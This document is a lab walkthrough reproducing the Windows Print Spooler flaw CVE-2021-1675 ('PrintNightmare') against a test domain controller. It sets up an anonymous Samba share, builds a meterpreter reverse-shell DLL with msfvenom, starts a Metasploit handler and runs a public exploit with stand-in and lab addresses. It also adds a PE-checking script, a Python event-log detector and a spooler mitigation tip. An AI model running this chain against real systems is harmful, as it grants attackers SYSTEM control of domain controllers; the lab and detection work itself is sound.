Reproducing Microsoft vulnerability CVE-2021-1675

Affected versions

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2012 R2

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2012

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for 32-bit Systems Service Pack 2

  • Windows RT 8.1

  • Windows 8.1 for x64-based systems

  • Windows 8.1 for 32-bit systems

  • Windows 7 for x64-based Systems Service Pack 1

  • Windows 7 for 32-bit Systems Service Pack 1

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2016

  • Windows 10 Version 1607 for x64-based Systems

  • Windows 10 Version 1607 for 32-bit Systems

  • Windows 10 for x64-based Systems

  • Windows 10 for 32-bit Systems

  • Windows Server, version 20H2 (Server Core Installation)

  • Windows 10 Version 20H2 for ARM64-based Systems

  • Windows 10 Version 20H2 for 32-bit Systems

  • Windows 10 Version 20H2 for x64-based Systems

  • Windows Server, version 2004 (Server Core installation)

  • Windows 10 Version 2004 for x64-based Systems

  • Windows 10 Version 2004 for ARM64-based Systems

  • Windows 10 Version 2004 for 32-bit Systems

  • Windows 10 Version 21H1 for 32-bit Systems

  • Windows 10 Version 21H1 for ARM64-based Systems

  • Windows 10 Version 21H1 for x64-based Systems

  • Windows Server, version 1909 (Server Core installation)

  • Windows 10 Version 1909 for ARM64-based Systems

  • Windows 10 Version 1909 for x64-based Systems

  • Windows 10 Version 1909 for 32-bit Systems

  • Windows Server 2019 (Server Core installation)

  • Windows Server 2019

  • Windows 10 Version 1809 for ARM64-based Systems

  • Windows 10 Version 1809 for x64-based Systems

  • Windows 10 Version 1809 for 32-bit Systems

Lab environment: Kali: 192.168.173.133
Domain controller: Windows Server 2019, 192.168.173.139 (use Server 2019 or 2016 for this walkthrough). Note that the PoC used below drives the RpcAddPrinterDriverEx path that Microsoft later tracked separately as CVE-2021-34527 ("PrintNightmare"); the June 2021 patch for CVE-2021-1675 alone did not block it, so a DC that only has that update is still a valid target for this reproduction.

First, set up a domain controller (the DC promotion steps are omitted here):

[Figure 1]

Create an ordinary (unprivileged) domain user; the exploit only needs valid domain credentials, not admin rights:

[Figures 2-6]

Windows machines, domain controllers included, have the Print Spooler service enabled by default, since printing does not work without it. That is exactly what makes this attack surface reachable: spoolsv.exe runs as SYSTEM and exposes MS-RPRN over RPC to any authenticated domain user. Before testing, confirm the service is running on the DC (Get-Service Spooler in PowerShell); conversely, the recommended mitigation on a DC that never prints is to stop and disable the Spooler service.

[Figure 7]

1. First download and install the exploit author's fork of impacket (it adds the MS-RPRN / MS-PAR protocol support the PoC needs); link:

https://github.com/cube0x0/impacket

[Figure 8]

Run:

cd impacket
python3 ./setup.py install

[Figure 9]

2. Enable anonymous SMB access (the DC will fetch the payload DLL from this share using the spooler's own SYSTEM context, so the share must be readable without credentials)

2.1 Configure /etc/samba/smb.conf
Here the original author's configuration didn't work for me either; I later referred to the configuration from the Gamma Lab WeChat account, which worked. Link: https://mp.weixin.qq.com/s/iNOb6cBAfMwCm2AjqbdEvQ

[Figure 10]

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes

After configuring, start smbd (the share name [smb] and path /tmp/ above are what the UNC path passed to the exploit will point at):

sudo service smbd start

Because spoolsv.exe is a 64-bit process, the DLL it loads must also be x64. Generate the DLL; LHOST must be the Kali address the handler below listens on (192.168.173.133), otherwise the payload will never call back:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.173.133 LPORT=7893 -f dll -o /tmp/rever.dll

[Figure 11]
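A practical check before pointing the exploit at the DC is to confirm the DLL really is a 64-bit DLL image, because a 32-bit or EXE-format payload is silently rejected by the 64-bit spooler. The following is an added example written for this page (it is not code from the original post or from the cube0x0 tooling). It parses the DOS header, follows e_lfanew to the PE signature and reads the COFF file header's Machine and Characteristics fields; build_stub_pe constructs header-only stubs for testing the parser and is not a loadable image. The path /tmp/rever.dll is the one generated above.

```python
import struct
import sys

# COFF Machine values from the PE/COFF specification
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_MACHINE_ARM64 = 0xAA64
# COFF Characteristics bit that marks a DLL image
IMAGE_FILE_DLL = 0x2000

MACHINE_NAMES = {
    IMAGE_FILE_MACHINE_I386: "x86",
    IMAGE_FILE_MACHINE_AMD64: "x64",
    IMAGE_FILE_MACHINE_ARM64: "arm64",
}


def pe_info(data: bytes) -> dict:
    """Walk DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF file header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    if len(data) < e_lfanew + 24:
        raise ValueError("truncated COFF header")
    # COFF header (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _, _, _, _, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    return {
        "machine": machine,
        "arch": MACHINE_NAMES.get(machine, f"unknown(0x{machine:04x})"),
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "sections": nsections,
    }


def suitable_for_spoolsv(data: bytes) -> bool:
    """True only for an x64 DLL, the only kind a 64-bit spoolsv.exe will load."""
    info = pe_info(data)
    return info["is_dll"] and info["machine"] == IMAGE_FILE_MACHINE_AMD64


def build_stub_pe(machine: int, characteristics: int) -> bytes:
    """Constructed header-only PE for exercising the parser; not a loadable image."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header follows the DOS header
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "/tmp/rever.dll"
    with open(path, "rb") as fh:
        blob = fh.read()
    info = pe_info(blob)
    print(f"{path}: arch={info['arch']} dll={info['is_dll']} sections={info['sections']}")
    sys.exit(0 if suitable_for_spoolsv(blob) else 1)
```

Run it as python3 pecheck.py /tmp/rever.dll; a non-zero exit means the payload would not be loadable by the 64-bit spooler. The same answer can be read off file /tmp/rever.dll, which reports "PE32+ executable (DLL) ... x86-64" for a correct payload.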

Start the listener:

msfconsole
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.173.133
set lport 7893
run

[Figure 12]

Exploit link:

https://github.com/cube0x0/CVE-2021-1675

[Figure 13]

Run the exploit directly. The last argument is the UNC path of the DLL on the anonymous share, built from the Kali address, the [smb] share name and the file under /tmp/ (quote it so the shell keeps the backslashes):

python3 CVE-2021-1675.py DOMAIN/domain_user:password@DC_IP '\\ATTACKER_IP\share\payload.dll'

With the addresses used in this lab that becomes:

python3 CVE-2021-1675.py DOMAIN/domain_user:password@192.168.173.139 '\\192.168.173.133\smb\rever.dll'

[Figures 14-16]
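The check a defender wants next to this procedure is what the attack leaves in the event logs. The following Python is an added example written for this page (not code from the original post or from the cube0x0 repository). It runs simple rules over constructed event records shaped like the Windows events this technique produces: PrintService/Operational Event ID 316 (driver added or updated, listing the package files; this log is off by default and must be enabled), PrintService/Admin Event ID 808 (spooler failed to load a plug-in module, which fires with the dropped DLL's path when a payload DLL does not behave like a driver), and Sysmon Event ID 11 (spoolsv.exe writing a DLL into spool\drivers\x64\3 or its New staging directory). The KNOWN_DRIVER_FILES allowlist and every record in SAMPLE_EVENTS are assumptions constructed for the example; rever.dll is the payload name generated above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

PRINTSERVICE_OPERATIONAL = "Microsoft-Windows-PrintService/Operational"
PRINTSERVICE_ADMIN = "Microsoft-Windows-PrintService/Admin"
SYSMON = "Microsoft-Windows-Sysmon/Operational"

# Event 316 lists the driver package files after "Files:-", ending at ". "
FILES_RE = re.compile(r"Files:-\s*(.+?)\.(?:\s|$)", re.IGNORECASE)
# A DLL under the x64 v3 driver store, including the New\ staging directory
DRIVER_STORE_RE = re.compile(
    r'\\spool\\drivers\\x64\\3\\(?:new\\)?([^\\\s",]+?\.dll)\b', re.IGNORECASE)
# Assumption: files a benign Unidrv-based package normally ships; tune per fleet
KNOWN_DRIVER_FILES = {"unidrv.dll", "unidrvui.dll", "unires.dll",
                      "stdnames.gpd", "stddtype.gdl", "stdschem.gdl", "stdschmx.gdl"}


@dataclass
class Alert:
    severity: str
    event_id: int
    detail: str


def analyze(events: List[Dict]) -> List[Alert]:
    """Apply the three PrintNightmare indicators to a list of event records."""
    alerts: List[Alert] = []
    for ev in events:
        ch, eid, msg = ev["channel"], ev["event_id"], ev["message"]
        if ch == PRINTSERVICE_OPERATIONAL and eid == 316:
            m = FILES_RE.search(msg)
            files = [f.strip().lower() for f in m.group(1).split(",")] if m else []
            unknown = [f for f in files if f not in KNOWN_DRIVER_FILES]
            if unknown:  # e.g. kernelbase.dll or an attacker DLL posing as a driver file
                alerts.append(Alert("medium", eid,
                                    "driver added with unexpected files: " + ", ".join(unknown)))
        elif ch == PRINTSERVICE_ADMIN and eid == 808:
            m = DRIVER_STORE_RE.search(msg)
            if m:
                alerts.append(Alert("high", eid,
                                    f"spooler failed loading plug-in {m.group(1)} from driver store"))
        elif ch == SYSMON and eid == 11 and ev.get("image", "").lower().endswith("\\spoolsv.exe"):
            m = DRIVER_STORE_RE.search(msg)
            if m:
                alerts.append(Alert("high", eid, f"spoolsv.exe wrote {m.group(1)} into driver store"))
    return alerts


# Constructed sample records (not captured logs); three malicious, two benign
SAMPLE_EVENTS = [
    {"channel": PRINTSERVICE_OPERATIONAL, "event_id": 316, "image": "",
     "message": "Printer driver 1234 for Windows x64 Version-3 was added or updated. "
                "Files:- UNIDRV.DLL, kernelbase.dll, rever.dll. No user action is required."},
    {"channel": SYSMON, "event_id": 11, "image": r"C:\Windows\System32\spoolsv.exe",
     "message": r"File created: TargetFilename: C:\Windows\System32\spool\drivers\x64\3\New\rever.dll"},
    {"channel": PRINTSERVICE_ADMIN, "event_id": 808, "image": "",
     "message": r"The print spooler failed to load a plug-in module "
                r"C:\Windows\system32\spool\DRIVERS\x64\3\rever.dll, error code 0x45A."},
    {"channel": PRINTSERVICE_OPERATIONAL, "event_id": 316, "image": "",
     "message": "Printer driver Generic Unidrv for Windows x64 Version-3 was added or updated. "
                "Files:- unidrv.dll, unidrvui.dll. No user action is required."},
    {"channel": SYSMON, "event_id": 11, "image": r"C:\Windows\System32\spoolsv.exe",
     "message": r"File created: TargetFilename: C:\Windows\System32\spool\PRINTERS\00004.SPL"},
]


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.severity}] event {a.event_id}: {a.detail}")
```

The 808 and Sysmon rules are the high-confidence ones; a 316 with unexpected files is weaker on its own because legitimate vendor packages also ship non-Unidrv DLLs, which is why the allowlist is an environment-specific assumption rather than a fixed signature.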

At this last step I hit a mysterious problem: the session never came back, not even when I copied my senior's VM environment, which did call back, onto my own machine, so I had him take a screenshot instead. I'll reinstall the OS this weekend; this isn't the first time this has happened, and reinstalling solves 100% of problems.
